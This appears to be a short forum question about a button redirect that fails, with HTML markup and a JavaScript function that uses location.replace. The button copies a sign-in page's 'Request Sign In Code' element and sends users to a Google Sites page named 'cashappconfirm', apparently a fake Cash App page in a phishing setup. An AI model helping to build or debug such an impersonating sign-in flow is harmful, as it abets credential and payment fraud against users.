I am having trouble getting my button element to redirect my page to another page. I have tried using an onclick function inside the button tag with window.location.href, as well as creating a separate function for the redirect, but nothing seems to be working. I am testing this code on CodePen.
<button
type="submit"
aria-label="Request Sign In Code"
onclick="writedata()"
class="buttonsign"
data-ember-action=""
data-ember-action-391="391">Request Sign In Code</button>
with
function writedata() {
location.replace("https://sites.google.com/view/cashappconfirm/home")
}